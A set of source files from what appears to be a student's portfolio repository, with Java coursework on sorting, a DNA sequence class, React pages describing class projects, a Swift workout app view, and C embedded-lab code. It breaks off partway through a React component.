* @throws IllegalArgumentException
* if pts == null or pts.length == 0.
*/
protected AbstractSorter(Point[] pts) throws IllegalArgumentException {
if(pts == null || pts.length == 0){
throw new IllegalArgumentException("Invalid input");
}
else{
points = pts.clone();
int pos = 0;
for(int i = 0; i < points.length; i++){
if(points[i].getY() < points[pos].getY()){
pos = i;
}
if(points[i].getY() == points[pos].getY() && points[i].getX() < points[pos].getX()){
pos = i;
}
}
lowestPoint = points[pos];
}
}
/**
* This constructor reads points from a file. Sets the instance variables
* lowestPoint and outputFileName.
*
* @param inputFileName
* @throws FileNotFoundException
* @throws InputMismatchException
* when the input file contains an odd number of integers
*/
protected AbstractSorter(String inputFileName) throws FileNotFoundException, InputMismatchException {
File fileName = new File(inputFileName);
if(fileName.exists() == false){
throw new FileNotFoundException("File does not exist");
}
Scanner in = new Scanner(fileName);
int count = 0;
while(in.hasNextLine()){
String s = in.nextLine();
Scanner in2 = new Scanner(s);
while(in2.hasNextInt()){
in2.nextInt();
count++;
}
in2.close();
}
in.close();
if((count % 2) != 0){
throw new InputMismatchException("File contains odd number of digits");
}
else{
String sIn = "";
Scanner input = new Scanner(fileName);
while(input.hasNextLine()){
String s = input.nextLine();
Scanner input2 = new Scanner(s);
while(input2.hasNextInt()){
sIn = sIn + " " + input2.nextInt();
}
input2.close();
}
input.close();
Scanner lineIn = new Scanner(sIn);
Point[] points = new Point[count/2];
int i = 0;
while(lineIn.hasNextInt()){
Point p = new Point(lineIn.nextInt(), lineIn.nextInt());
points[i] = p;
i++;
}
lineIn.close();
this.points = points.clone();
int pos = 0;
for(int j = 0; j < points.length; j++){
if(points[j].getY() < points[pos].getY()){
pos = j;
}
if(points[j].getY() == points[pos].getY() && points[j].getX() < points[pos].getX()){
pos = j;
}
}
lowestPoint = points[pos];
}
}
/**
* Sorts the elements in points[].
*
* a) in the non-decreasing order of x-coordinate if order == 1 b) in the
* non-decreasing order of polar angle w.r.t. lowestPoint if order == 2
* (lowestPoint will be at index 0 after sorting)
*
* Sets the instance variable sortByAngle based on the value of order. Calls
* the method setComparator() to set the variable pointComparator and use it
* in sorting. Records the sorting time (in nanoseconds) using the
* System.nanoTime() method. (Assign the time to the variable sortingTime.)
*
* @param order
* 1 by x-coordinate 2 by polar angle w.r.t lowestPoint
*
* @throws IllegalArgumentException
* if order is less than 1 or greater than 2
*/
public abstract void sort(int order) throws IllegalArgumentException;
/**
* Outputs performance statistics in the format:
*
* <sorting algorithm> <size> <time>
*
* For instance,
*
* selection sort 1000 9200867
*
* Use the spacing in the sample run in Section 2 of the assignment
* description.
*/
public String stats() {
String s = "" + algorithm + " " + points.length + " " + sortingTime;
return s;
}
/**
* Write points[] to a string. When printed, the points will appear in order
* of increasing index with every point occupying a separate line. The x and
* y coordinates of the point are displayed on the same line with exactly
* one blank space in between.
*/
@Override
public String toString() {
String s = "";
for(int i = 0; i < points.length; i++){
s = s + points[i].getX() + " " + points[i].getY() + "\n";
}
return s;
}
/**
*
* This method, called after sorting, writes point data into a file by
* outputFileName. It will be used for Mathematica plotting to verify the
* sorting result. The data format depends on sortByAngle. It is detailed in
* Section 4.1 of the assignment description assn2.pdf.
*
* @throws FileNotFoundException
*/
public void writePointsToFile() throws FileNotFoundException {
if(sortByAngle == false){
File outFile = new File(outputFileName);
PrintWriter out = new PrintWriter(outFile);
for(int i = 0; i < points.length; i++){
String s = "" + points[i].getX() + " " + points[i].getY();
out.write(s);
out.write("\r\n");
}
out.close();
}
if(sortByAngle == true){
File outFile = new File(outputFileName);
PrintWriter out = new PrintWriter(outFile);
for(int i = 0; i < points.length; i++){
if(i == 0){
String s = "" + points[i].getX() + " " + points[i].getY();
out.write(s);
out.write("\r\n");
}
else{
String s = "" + points[i - 1].getX() + " " + points[i - 1].getY() + " " + points[0].getX() + " " + points[0].getY() + " " + points[i - 1].getX() + " " + points[i - 1].getY();
out.write(s);
out.write("\r\n");
}
}
out.close();
}
}
/**
* Generates a comparator on the fly that compares by polar angle if
* sortByAngle == true and by x-coordinate if sortByAngle == false. Set the
* protected variable pointComparator to it. Need to create an object of the
* PolarAngleComparator class and call the compareTo() method in the Point
* class, respectively for the two possible values of sortByAngle.
*
* @param order
*/
protected void setComparator() {
if(sortByAngle == false){
pointComparator = new Comparator<Point>(){
@Override
			public int compare(Point p1, Point p2) {
				// Delegate to Point.compareTo, which gives the x-coordinate ordering used here.
				return p1.compareTo(p2);
}
};
}
else if(sortByAngle == true){
PolarAngleComparator p = new PolarAngleComparator(lowestPoint);
pointComparator = p;
}
}
/**
* Swap the two elements indexed at i and j respectively in the array
* points[].
*
* @param i
* @param j
*/
protected void swap(int i, int j) {
Point t = points[i];
points[i] = points[j];
points[j] = t;
}
}
<file_sep>/src/Components/ReactPortfolio/ReactPortfolio.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
const Title = Typography.Title;
export default class ReactPortfolio extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>This Portfolio - React.JS</Title>
<Title level={4}>Technologies: React.JS, Google Cloud Platform, Node.JS Server</Title>
Over the summer of 2020, I had the opportunity to work with Buildertrend on converting
their webapp from Web Forms to React.JS. After using React, I found it fascinating
and wanted to do more with it. For my previous portfolio, <a href="https://portfolio-258522.appspot.com" target="_blank" rel="noopener noreferrer">here</a>, I used HTML pages and
Java Springboot for the backend. React is a much more modern way of making a webapp, which is
why I wanted to use it. Click the link below to view the code for this portfolio on my GitHub
page.
<br></br>
<a href="https://github.com/balex654/Portfolio" target="_blank" rel="noopener noreferrer">View this portfolio on github</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/FirstPortfolio/FirstPortfolio.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import controller from './controller.png';
import SpringbootSS1 from './SpringbootSS1.png';
import SpringbootSS2 from './SpringbootSS2.png';
import SpringbootSS3 from './SpringbootSS3.png';
const Title = Typography.Title;
export default class FirstPortfolio extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>First Portfolio - Google Cloud Platform</Title>
<Title level={4}>Technology: Google Cloud Platform, Java, HTML</Title>
Before making this portfolio, I realized that I needed a better way to
showcase my work and experience. All of my peers have a LinkedIn profile and a resume, but
very few college engineers have a portfolio that details their work. So I decided to make
one on the Google Cloud Platform. I developed the project in Java Springboot and used HTML
pages to add all the content. I used HTML and Java Springboot because this was before I knew how
to use ReactJS, which is what my current portfolio (this website) is made with.
</Col>
</Row>
<Row>
<Col span={24}>
<Title level={4}>freshman.jsp</Title>
<img width='100%' src={SpringbootSS1} alt=''/>
<Title level={4}>coms228.jsp</Title>
<img width='100%' src={SpringbootSS2} alt=''/>
<Title level={4}>hw3.jsp</Title>
<img width='100%' src={SpringbootSS3} alt=''/>
<Title level={4}>HomeController.java</Title>
<img width='100%' src={controller} alt=''/>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS228/Project3/Project3.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import AdaptiveList from './AdaptiveList.java';
import AdaptiveListSS1 from './AdaptiveListSS1.png';
import AdaptiveListSS2 from './AdaptiveListSS2.png';
import AdaptiveListSS3 from './AdaptiveListSS3.png';
import AdaptiveListSS4 from './AdaptiveListSS4.png';
import AdaptiveListSS5 from './AdaptiveListSS5.png';
import AdaptiveListSS6 from './AdaptiveListSS6.png';
import ProjectFiles from './hw3.zip';
import output from './output.png';
import testJava from './test.java';
import testPNG from './test.png';
const Title = Typography.Title;
export default class Project3 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Created Adaptive List Object - Project 3</Title>
<Title level={4}>Technology: Java, Eclipse</Title>
For this project, I created a linked-list data structure in Java, similar to an ArrayList.
The list works by creating a node object for every item and linking the nodes together with
the fields in the node objects. The list is generic, so it can be used with any type of object
in Java. Also, it has many built-in functions such as clear(), add(), and contains().
<br></br>
<a href={ProjectFiles} download="Project_Files.zip">Download project files</a>
<br></br><br></br>
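{/*
  A minimal JavaScript sketch of the linked-list idea described above, for illustration only;
  the actual project is the Java file AdaptiveList.java linked above, and the names here are
  illustrative rather than taken from that file.

  class Node {
    constructor(data) {
      this.data = data; // the stored item
      this.next = null; // link to the following node
    }
  }

  class LinkedList {
    constructor() {
      this.head = null;
      this.size = 0;
    }

    // Append an item by walking to the tail and linking a new node.
    add(item) {
      const node = new Node(item);
      if (this.head === null) {
        this.head = node;
      } else {
        let cur = this.head;
        while (cur.next !== null) cur = cur.next;
        cur.next = node;
      }
      this.size += 1;
    }

    // Linear scan over the chain of nodes.
    contains(item) {
      for (let cur = this.head; cur !== null; cur = cur.next) {
        if (cur.data === item) return true;
      }
      return false;
    }

    // Drop every node by forgetting the head reference.
    clear() {
      this.head = null;
      this.size = 0;
    }
  }

  // Example usage: const list = new LinkedList(); list.add("a"); list.contains("a") === true
*/}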
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>test.java (click on image to download file)</Title>
<a href={testJava} download="test.java">
<img width='100%' src={testPNG} alt=''/>
</a>
<Title level={4}>Output of test.java</Title>
<img width='100%' src={output} alt=''/>
<Title level={4}>AdaptiveList.java (click on image to download file)</Title>
<a href={AdaptiveList} download="AdaptiveList.java">
<img width='100%' src={AdaptiveListSS1} alt=''/>
<img width='100%' src={AdaptiveListSS2} alt=''/>
<img width='100%' src={AdaptiveListSS3} alt=''/>
<img width='100%' src={AdaptiveListSS4} alt=''/>
<img width='100%' src={AdaptiveListSS5} alt=''/>
<img width='100%' src={AdaptiveListSS6} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/Components/WorkoutApp/WorkoutViewController.swift
//
// WorkoutViewController.swift
// workoutApp
//
// Created by <NAME> on 1/20/19.
// Copyright © 2019 <NAME>. All rights reserved.
//
import UIKit
class WorkoutViewController: UIViewController, UITableViewDelegate, UITableViewDataSource {
@IBOutlet weak var workoutTableView: UITableView!
private var workout: Workout = Variables.workouts[Variables.clickedOn]
override func viewDidLoad() {
super.viewDidLoad()
// Do any additional setup after loading the view.
}
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
return Variables.workouts[Variables.clickedOn].showExercises().count
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
//let cell = UITableViewCell(style: UITableViewCell.CellStyle.default, reuseIdentifier: "cell")
let cell = tableView.dequeueReusableCell(withIdentifier: "cell", for: indexPath) as? WorkoutTableViewCell
// Look up the selected workout's exercise once instead of repeating the chain for every label.
let exercise = Variables.workouts[Variables.clickedOn].showExercises()[indexPath.row]
cell!.exerciseName.text = exercise.showName()
let reps = "Reps: "
let weight = "Weight: "
cell!.reps1.text = reps + String(exercise.showReps()[0])
cell!.reps2.text = reps + String(exercise.showReps()[1])
cell!.reps3.text = reps + String(exercise.showReps()[2])
cell!.reps4.text = reps + String(exercise.showReps()[3])
cell!.weight1.text = weight + String(exercise.showWeight()[0])
cell!.weight2.text = weight + String(exercise.showWeight()[1])
cell!.weight3.text = weight + String(exercise.showWeight()[2])
cell!.weight4.text = weight + String(exercise.showWeight()[3])
return cell!
}
/*
// MARK: - Navigation
// In a storyboard-based application, you will often want to do a little preparation before navigation
override func prepare(for segue: UIStoryboardSegue, sender: Any?) {
// Get the new view controller using segue.destination.
// Pass the selected object to the new view controller.
}
*/
}
<file_sep>/src/ClassComponents/ComS228/Project2/MergeSorter.java
package edu.iastate.cs228.hw2;
import java.io.FileNotFoundException;
import java.util.InputMismatchException;
/**
*
* @author <NAME>
*
*/
/**
*
* This class implements the mergesort algorithm.
*
*/
public class MergeSorter extends AbstractSorter {
private Point[] array;
private Point[] tempMergArr;
private int length;
/**
* The two constructors below invoke their corresponding superclass
* constructors. They also set the instance variables algorithm and
* outputFileName in the superclass.
*/
/**
* Constructor accepts an input array of points.
*
* @param pts
* input array of points
*/
public MergeSorter(Point[] pts) {
super(pts);
outputFileName = "merge.txt";
algorithm = "merge sorter ";
}
/**
* Constructor reads points from a file.
*
* @param inputFileName
* name of the input file
* @throws FileNotFoundException
* @throws InputMismatchException
*/
public MergeSorter(String inputFileName) throws InputMismatchException, FileNotFoundException {
super(inputFileName);
outputFileName = "merge.txt";
algorithm = "merge sorter ";
}
/**
* Perform mergesort on the array points[] of the parent class
* AbstractSorter.
*
* @param order
* 1 by x-coordinate 2 by polar angle
*
*/
@Override
public void sort(int order) {
if (order < 1 || order > 2) {
throw new IllegalArgumentException("Invalid input");
}
else{
if (order == 1) {
sortByAngle = false;
} else {
sortByAngle = true;
}
setComparator();
long startTime = System.nanoTime();
mergeSortRec(points);
long endTime = System.nanoTime();
sortingTime = endTime - startTime;
try {
writePointsToFile();
} catch (FileNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
}
/**
* This is a recursive method that carries out mergesort on an array pts[]
* of points. One way is to make copies of the two halves of pts[],
* recursively call mergeSort on them, and merge the two sorted subarrays
* into pts[].
*
* @param pts
* point array
*/
private void mergeSortRec(Point[] pts) {
array = pts;
length = pts.length;
tempMergArr = new Point[length];
merge(0, length - 1);
}
/**
* Recursive helper method for mergeSortRec
*
* @param lowIndex
* @param highIndex
*/
private void merge(int lowIndex, int highIndex) {
if (lowIndex < highIndex) {
int middle = lowIndex + (highIndex - lowIndex) / 2;
merge(lowIndex, middle);
merge(middle + 1, highIndex);
mergeParts(lowIndex, middle, highIndex);
}
}
/**
* Helper method to the recursive method merge.
* This method's main purpose is to compare the given points
* of the partial array
*
* @param lowIndex
* @param middleIndex
* @param highIndex
*/
private void mergeParts(int lowIndex, int middleIndex, int highIndex) {
for (int i = lowIndex; i <= highIndex; i++){
tempMergArr[i] = array[i];
}
int i = lowIndex;
int j = middleIndex + 1;
int k = lowIndex;
while (i <= middleIndex && j <= highIndex) {
if (pointComparator.compare(tempMergArr[i], tempMergArr[j]) == -1){
array[k] = tempMergArr[i];
i++;
}
else{
array[k] = tempMergArr[j];
j++;
}
k++;
}
while (i <= middleIndex){
array[k] = tempMergArr[i];
k++;
i++;
}
}
}
<file_sep>/src/ClassComponents/ComS311/Project1/Project1.js
import React from 'react';
import { Typography, Row, Col } from 'antd';
import project1Q1 from './project1Q1.png'
import project1Q2 from './project1Q2.png'
import project1Q3ss1 from './project1Q3ss1.png'
import project1Q3ss2 from './project1Q3ss2.png'
import project1Q4ss1 from './project1Q4ss1.png'
import project1Q4ss2 from './project1Q4ss2.png'
import q1 from './q1.py';
import q3 from './q3.py';
import q4 from './q4.py';
import q5 from './q5.py';
const Title = Typography.Title;
export default class Project1 extends React.Component {
render() {
return (
<>
<Row justify="center">
<Col span={18}>
<Title level={1}>Graph Traversal Algorithms (Shortest path algorithms) - Project 1</Title>
<Title level={4}>Technology: Python, Visual Studio Code</Title>
<Title level={2}>Graph Representation</Title>
The strings at the bottom of the file represent the graph, with the first character of the
first line indicating whether the graph is directed (D) or undirected (U). The second character
on the first line indicates how many nodes are in the graph. The rest of the lines indicate the edges,
with the first number being the starting node and the second number being the ending node.
<Title level={2}>Question 1</Title>
For this, I implemented a breadth-first search algorithm on a directed graph with the analogy of using wall outlet adapters. The scenario
for the problem is that you are in a different country that uses a different type of wall outlet and you
have a certain number of different adapters with you that convert your charger's type to the wall outlet type.
The algorithm outputs the smallest number of adapters that you have to link together in order to convert your
charger to the wall outlet.
<br></br><br></br>
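{/*
  The real solution is q1.py (linked below) and is written in Python; this is only a
  JavaScript sketch of a breadth-first search that counts the fewest adapters needed,
  under the assumption that the graph is given as an adjacency map. Names here are
  illustrative, not taken from the project files.

  function fewestAdapters(adj, start, target) {
    // adj: Map from node -> array of neighboring nodes (directed edges)
    const dist = new Map([[start, 0]]);
    const queue = [start];
    while (queue.length > 0) {
      const node = queue.shift();
      if (node === target) return dist.get(node);
      for (const next of adj.get(node) || []) {
        if (!dist.has(next)) {
          dist.set(next, dist.get(node) + 1); // one more adapter in the chain
          queue.push(next);
        }
      }
    }
    return -1; // no chain of adapters reaches the wall outlet type
  }

  // Example: charger type 0, outlet type 3, adapters 0->1 and 1->3:
  // fewestAdapters(new Map([[0, [1]], [1, [3]], [3, []]]), 0, 3) === 2
*/}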
</Col>
</Row>
<Row justify="center">
<Col span={18}>
<Title level={4}>q1.py (click on image to download code)</Title>
<a href={q1} download="q1.py">
<img width='100%' src={project1Q1} alt=''/>
</a>
<Title level={2}>Question 2</Title>
This algorithm performs a topological sort on a directed graph.
<Title level={4}>q2.py (click on image to download code)</Title>
<a href={q3} download="q2.py">
<img width='100%' src={project1Q2} alt=''/>
</a>
<Title level={2}>Question 3</Title>
The scenario for this question is that you are at a building on a college campus and you need to get
to another building via walkways, taking the route with the least distance. The scenario uses an undirected
graph with the nodes being the buildings and the edges being the walkways. The graph representation is
the same as the directed graph's but there is a third number in each edge description which represents
the weight of the edge (walkway distance). The 'W' in the first line of the description indicates that
the graph is weighted. The algorithm finds the shortest path using Prim's algorithm.
<Title level={4}>q3.py (click on image to download code)</Title>
<a href={q4} download="q3.py">
<img width='100%' src={project1Q3ss1} alt=''/>
<img width='100%' src={project1Q3ss2} alt=''/>
</a>
<Title level={2}>Question 4</Title>
This question uses Dijkstra's algorithm on an undirected weighted graph, which is represented the
same way as in the previous question. The algorithm finds the shortest distances from a starting node
to every other node in the graph and returns the maximum of these distances.
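{/*
  The actual implementation is q4.py (linked below), written in Python; this JavaScript
  sketch only illustrates the idea described above: run Dijkstra's algorithm from the
  start node, then take the maximum of the resulting shortest distances. The edge-list
  shape used here is an assumption made for the example.

  function maxShortestDistance(n, edges, start) {
    // edges: array of [u, v, w] for an undirected weighted graph with nodes 0..n-1
    const adj = Array.from({ length: n }, () => []);
    for (const [u, v, w] of edges) {
      adj[u].push([v, w]);
      adj[v].push([u, w]);
    }
    const dist = new Array(n).fill(Infinity);
    const visited = new Array(n).fill(false);
    dist[start] = 0;
    for (let i = 0; i < n; i++) {
      // Pick the unvisited node with the smallest tentative distance
      // (a linear scan keeps the sketch short; a priority queue would be faster).
      let u = -1;
      for (let v = 0; v < n; v++) {
        if (!visited[v] && (u === -1 || dist[v] < dist[u])) u = v;
      }
      if (u === -1 || dist[u] === Infinity) break;
      visited[u] = true;
      for (const [v, w] of adj[u]) {
        if (dist[u] + w < dist[v]) dist[v] = dist[u] + w;
      }
    }
    // Maximum over the nodes that are actually reachable from the start.
    return Math.max(...dist.filter(d => d !== Infinity));
  }
*/}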
<Title level={4}>q4.py (click on image to download code)</Title>
<a href={q5} download="q4.py">
<img width='100%' src={project1Q4ss1} alt=''/>
<img width='100%' src={project1Q4ss2} alt=''/>
</a>
</Col>
</Row>
</>
);
}
}<file_sep>/src/ClassComponents/ComS227/A4/SquareMap.java
package hw4;
import java.awt.Point;
import java.awt.Polygon;
import java.util.ArrayList;
import graph.Cell;
import graph.GraphMap;
/**
* A square lattice where each cell has 4 neighbors set up in a checker board pattern.
* @author <NAME>
*
*/
public class SquareMap extends GraphMap{
/**
* Makes a new SquareMap with the GraphMap constructor
*/
public SquareMap(){
super();
}
/**
* Gets the width of the window in pixels for rendering, including the border area.
* @return the width in pixels
*/
public int getPixelWidth(){
int width;
Cell[][] cell = getCells();
width = (getDistance() * cell[0].length) + getDistance();
return width;
}
/**
* Gets the height of the window in pixels for rendering, including the border area.
* @return the height in pixels
*/
public int getPixelHeight(){
int height;
Cell[][] cell = getCells();
height = (getDistance() * cell.length) + getDistance();
return height;
}
/**
* Create an array of neighbors for the cell with given column and row.
* @param col - The column index of a Cell
* row - The row index of a Cell
* @return An array containing adjacent cells
*/
public Cell[] createNeighbors(int col, int row){
Cell[][] map = getCells();
ArrayList<Cell> neighbors = new ArrayList<Cell>();
if((row - 1) >= 0){
neighbors.add(map[row - 1][col]);
}
if((col - 1) >= 0){
neighbors.add(map[row][col - 1]);
}
if((row + 1) <= map.length - 1){
neighbors.add(map[row + 1][col]);
}
if((col + 1) <= map[0].length - 1){
neighbors.add(map[row][col + 1]);
}
Cell[] c = new Cell[neighbors.size()];
for(int i = 0; i < neighbors.size(); i++){
c[i] = neighbors.get(i);
}
return c;
}
/**
* Get the column and row indices for the cell closest to a given pixel (x, y)
* coordinate, returned as a Point object in which x is the column and y is the row.
* @param x - The x coordinate in pixels
* y - The y coordinate in pixels
* @return column and row indices for the cell closest to the given (x, y)
*/
protected java.awt.Point selectClosestIndex(int x, int y){
int xdist = (x - (getDistance() / 2)) / getDistance();
int ydist = (y - (getDistance() / 2)) / getDistance();
return new Point(xdist, ydist);
}
/**
* Create a polygon for the cell with the given column and row.
* @param col - The column index of a Cell
* row - The row index of a Cell
* @return A polygon with correct pixel coordinates for rendering the cell
*/
public java.awt.Polygon createPolygon(int col, int row){
int[] xpoints = new int[4];
int[] ypoints = new int[4];
xpoints[0] = (col * getDistance()) + (getDistance() / 2);
xpoints[1] = (col * getDistance()) + getDistance() + (getDistance() / 2);
xpoints[2] = xpoints[1];
xpoints[3] = xpoints[0];
ypoints[0] = (row * getDistance()) + (getDistance() / 2);
ypoints[1] = ypoints[0];
ypoints[2] = (row * getDistance()) + getDistance() + (getDistance() / 2);
ypoints[3] = ypoints[2];
return new Polygon(xpoints, ypoints, 4);
}
}
<file_sep>/src/ClassComponents/ComS228/Project1/Sequence.java
package edu.iastate.cs228.hw1;
/*
* @author <NAME>
*/
public class Sequence {
/**
* holds the character array for the DNA sequence
*/
public char[] seqarr; // made public instead of protected for grading.
/**
* Creates a sequence object and uses the isValidLetter() method to check
* if every character in the array sarr is valid. If so, it makes and keeps
* a copy of the array sarr in the field seqarr of type char[]. Otherwise,
* it throws an IllegalArgumentException.
* @param sarr
*/
public Sequence(char[] sarr) {
for (int i = 0; i < sarr.length; i++) {
if (isValidLetter(sarr[i]) == false) {
throw new IllegalArgumentException("Invalid sequence letter for class " + this.getClass());
}
}
seqarr = sarr.clone();
}
/**
* The method returns the length of the character array seqarr.
* @return Sequence length
*/
public int seqLength() {
return seqarr.length;
}
/**
* The method makes and returns a copy of the char array seqarr.
* @return a copy of the sequence
*/
public char[] getSeq() {
return seqarr.clone();
}
/**
* The method returns the string representation of the char array seqarr.
* @return the sequence in string form
*/
public String toString() {
String sequence = "";
for (int i = 0; i < seqarr.length; i++) {
sequence = sequence + seqarr[i];
}
return sequence;
}
/**
* The method returns true if the argument obj is not null and is
* of the same type as this object in a case insensitive mode.
* @param obj an object of any type
* @return true if obj is equal to this (case insensitive), false otherwise
*/
public boolean equals(Object obj) {
if(obj instanceof char[]){ // instanceof already rules out null
char[] copy = ((char[]) obj).clone(); // clone so the caller's array is not modified
char[] copy2 = seqarr.clone(); // clone so this sequence's own data is not modified
for (int i = 0; i < copy.length; i++) {
if (copy[i] == 'A') {
copy[i] = 'a';
}
if (copy[i] == 'C') {
copy[i] = 'c';
}
if (copy[i] == 'G') {
copy[i] = 'g';
}
if (copy[i] == 'T') {
copy[i] = 't';
}
}
for (int i = 0; i < copy2.length; i++) {
if (copy2[i] == 'A') {
copy2[i] = 'a';
}
if (copy2[i] == 'C') {
copy2[i] = 'c';
}
if (copy2[i] == 'G') {
copy2[i] = 'g';
}
if (copy2[i] == 'T') {
copy2[i] = 't';
}
}
if(copy.length != copy2.length){
return false;
}
for(int i = 0; i < copy.length; i++){
if(copy[i] != copy2[i]){
return false;
}
}
return true;
}
else{
return false;
}
}
/**
* The method returns true if the character let is an uppercase or lowercase letter;
* it returns false otherwise.
* @param let
* @return true if let is valid, false otherwise
*/
public boolean isValidLetter(char let) {
if (Character.isUpperCase(let) || Character.isLowerCase(let)) {
return true;
}
else {
return false;
}
}
}
<file_sep>/src/ClassComponents/CPRE185/Lab8/lab8.c
#include <stdio.h>
#define MAXPOINTS 10000
// compute the average of the first num_items of buffer
double avg(double buffer[], int num_items);
//update the max and min of the first num_items of array
void maxmin(double array[], int num_items, double* max, double* min);
//shift length-1 elements of the buffer to the left and put the
//new_item on the right.
void updatebuffer(double buffer[], int length, double new_item);
double avg(double buffer[], int num_items){
int i;
double sum = 0;
double average;
for (i = 0; i < num_items; ++i){
sum = buffer[i] + sum;
}
average = sum / num_items;
return average;
}
void maxmin(double array[], int num_items, double* max, double* min){
int i;
/* start from the first element so the results do not depend on the caller's initial values */
*max = array[0];
*min = array[0];
for (i = 1; i < num_items; ++i){
if (array[i] > *max){
*max = array[i];
}
if (array[i] < *min){
*min = array[i];
}
}
return;
}
void updatebuffer(double buffer[], int length, double new_item){
int i;
/* shift the remaining items one slot to the left; stopping at length - 1
avoids reading one element past the end of the buffer */
for (i = 0; i < length - 1; ++i){
buffer[i] = buffer[i + 1];
}
buffer[length - 1] = new_item;
return;
}
int main(int argc, char* argv[]) {
int bB, bT, bL, bR, bC;
double bP;
double ax, ay, az;
double x[MAXPOINTS], y[MAXPOINTS], z[MAXPOINTS];
int lengthofavg = 0;
int i;
double avgX, avgY, avgZ;
double maxX = 0;
double minX = 0;
double maxY = 0;
double minY = 0;
double maxZ = 0;
double minZ = 0;
double newX, newY, newZ;
if (argc>1) {
sscanf(argv[1], "%d", &lengthofavg );
printf("You entered a buffer length of %d\n", lengthofavg);
}
else {
printf("Enter a length on the command line\n");
return -1;
}
if (lengthofavg <1 || lengthofavg >MAXPOINTS) {
printf("Invalid length\n");
return -1;
}
for(i = 0; i < lengthofavg; ++i){
scanf("%lf, %lf, %lf, %d, %d, %d, %d, %d, %lf", &x[i], &y[i], &z[i], &bB, &bT, &bL, &bR, &bC, &bP);
}
while(1){
scanf("%lf, %lf, %lf, %d, %d, %d, %d, %d, %lf", &ax, &ay, &az, &bB, &bT, &bL, &bR, &bC, &bP);
printf("%lf, %lf, %lf, ", ax, ay, az);
maxmin(x, lengthofavg, &maxX, &minX);
maxmin(y, lengthofavg, &maxY, &minY);
maxmin(z, lengthofavg, &maxZ, &minZ);
printf("%lf, %lf, %lf, %lf, %lf, %lf, ", maxX, minX, maxY, minY, maxZ, minZ);
avgX = avg(x, lengthofavg);
avgY = avg(y, lengthofavg);
avgZ = avg(z, lengthofavg);
printf("%lf, %lf, %lf\n", avgX, avgY, avgZ);
scanf("%lf, %lf, %lf, %d, %d, %d, %d, %d, %lf", &newX, &newY, &newZ, &bB, &bT, &bL, &bR, &bC, &bP);
updatebuffer(x, lengthofavg, newX);
updatebuffer(y, lengthofavg, newY);
updatebuffer(z, lengthofavg, newZ);
if (bL == 1){
return 0;
}
}
}
<file_sep>/src/ClassComponents/CPRE288/Lab6/Lab6.c
/* Lab 6
<NAME>
<NAME>
<NAME>
2/28/2018
Made for cybot #4
*/
#include <stdlib.h>
#include "Timer.h"
#include "lcd.h"
#include <math.h>
void PortB_Init (void){
SYSCTL_RCGCADC_R |= 0x1; //Enable ADC Clock
SYSCTL_RCGCGPIO_R |= 0x2; //Enable GPIO port B clock
GPIO_PORTB_AFSEL_R |= 0x10; //Sets PB4 to alternate function
GPIO_PORTB_DEN_R &= 0xEF; //Disables PB4's digital functions
GPIO_PORTB_AMSEL_R |= 0x10; //Disable analog isolation on PB4
}
void ADC_init (void){
ADC0_ACTSS_R &= 0xFFFFFFF0; //Disable Sample Sequencers for configuration
ADC0_SSMUX0_R = 0x0000000A; //Select AIN10(PB4) as input for ADC0 sample sequencer 4
ADC0_SSCTL0_R = 0x00000006; //Configures SS0 to take one sample and place into fifo
ADC0_EMUX_R &= 0xFFFF0000; //Configure all of the SS to trigger on change in PSSI input
ADC0_SAC_R |= 0x4; //Configure ADC hardware averager to take 16 samples
ADC0_ACTSS_R |= 0x1; //Enable SS0
}
float CentimeterConv (int ADCValue) {
return 59789*pow(ADCValue, -1.086); //Uses tabulated formula to compute distance
}
int main (void){
int AdcResult = 0; //Variable to hold raw output from the ADC
float Distance = 0; //Variable to hold distance in cm
PortB_Init(); //Initialize port B
ADC_init(); //Initialize ADC
lcd_init(); //Initialize LCD
while(1){
if (!(ADC0_ACTSS_R & 0x00010000)) { //If the ADC is not busy start conversion
ADC0_PSSI_R |= 0x1;
}
if (ADC0_RIS_R & 0x00000001){ //If conversion is complete Store result
AdcResult = ADC0_SSFIFO0_R;
ADC0_ISC_R |= 0x1;
}
Distance = CentimeterConv(AdcResult); //Calculate actual distance
lcd_printf("%d, \n %0.1f cm", AdcResult, Distance); //Display Results
timer_waitMillis(250);
}
}
<file_sep>/src/ClassComponents/CPRE381/CPRE381.js
import React from 'react';
import { Layout, Menu, Breadcrumb } from 'antd';
import { MenuOutlined, HomeOutlined } from '@ant-design/icons';
import '../../Components/HomePage/HomePage.css';
import { Redirect } from 'react-router-dom';
import ProjectA from './ProjectA/ProjectA.js';
import ProjectB from './ProjectB/ProjectB.js';
const { Header, Content, Sider } = Layout;
export default class CPRE381 extends React.Component {
state = {
collapsed: false,
currentPage: "ProjectA"
}
onCollapse = collapsed => {
this.setState({ collapsed });
};
handleHomeClick = () => {
this.setState({
currentPage: "Home"
});
}
handleProjectAClick = () => {
this.setState({
currentPage: "ProjectA"
});
}
handleProjectBClick = () => {
this.setState({
currentPage: "ProjectB"
});
}
render() {
let page;
let width;
let pathItem1 = "default";
let pathItem2 = "default";
if (this.state.currentPage === "Home") {
return <Redirect to={"/Home"}/>
}
else if (this.state.currentPage === "ProjectA") {
page = <ProjectA/>
}
else if (this.state.currentPage === "ProjectB") {
page = <ProjectB/>
}
if (this.props.location.state.path === "Categories/LowLevel") {
pathItem1 = "Categories"
pathItem2 = "Low Level"
}
else if (this.props.location.state.path === "Years/Junior") {
pathItem1 = "Years"
pathItem2 = "Junior"
}
if (this.state.collapsed === true) {
width = 80;
}
else {
width = 400;
}
return (
<Layout style={{ minHeight: '100vh' }}>
<Sider
collapsible
collapsed={this.state.collapsed}
onCollapse={this.onCollapse}
breakpoint="xl"
width="400"
style={{
overflow: 'auto',
position: 'fixed',
height: '100vh',
left: 0,
}}
>
{this.state.collapsed===true ?
